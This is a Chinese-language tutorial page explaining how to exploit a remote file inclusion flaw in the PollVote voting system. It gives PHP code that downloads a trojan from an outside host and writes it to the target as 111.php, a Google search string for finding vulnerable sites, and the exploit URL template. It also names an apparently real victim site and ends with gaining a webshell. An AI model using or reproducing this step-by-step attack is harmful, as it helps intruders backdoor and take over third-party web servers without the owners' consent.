手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >PollVote投票系统漏洞利用
PollVote投票系统漏洞利用
摘要:PollVote是一个投票系统,今天看了非安全的杂志,看了利用方法,不过作者说利用过程的时候很烦琐,关键的时候又没说明白,简单的说一下``首...

PollVote是一个投票系统,今天看了非安全的杂志,看了利用方法,

不过作者说利用过程的时候很烦琐,关键的时候又没说明白,

简单的说一下``

首先建立2个文本分别是creatfile.txt和phpdoor.txt

creatfile.txt内容写

<?

$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");

$ff=fopen("111.php","a");

fwrite($ff,$f);

fclose($ff);

?>

phpdoor.txt内容就写个PHP木马

之后在http://www.google.com搜索关键词"pollvote.php?pollname"

有很多,

搜索到一个http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg

就是他了

EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls

这个就是利用原理了,

刚才说到的creatfile.txt和phpdoor.txt这个2个文件都上传到自己的空间里

执行http://www.skinnyturd.co.uk/poll...o.com/creatfile.txt

这样

phpdoor.txt里的内容就会生成一个111.php

这样我们就得到WEBSHELL了

http://www.skinnyturd.co.uk/poll/111.php

【PollVote投票系统漏洞利用】相关文章:

蓝雨设计整站SQL注入漏洞

eWebSoft在线编辑器漏洞利用技巧

O-blog漏洞暴光

phpwind管理权限泄露漏洞利用程序发布

Oblog3.0漏洞曝光

动网7.x权限提升漏洞原理

ETP 留言本v1.5爆出漏洞及利用方法

某省高考志愿填报系统的漏洞实战解说

BBSXP漏洞再探究

IIS漏洞整理大全

精品推荐
分类导航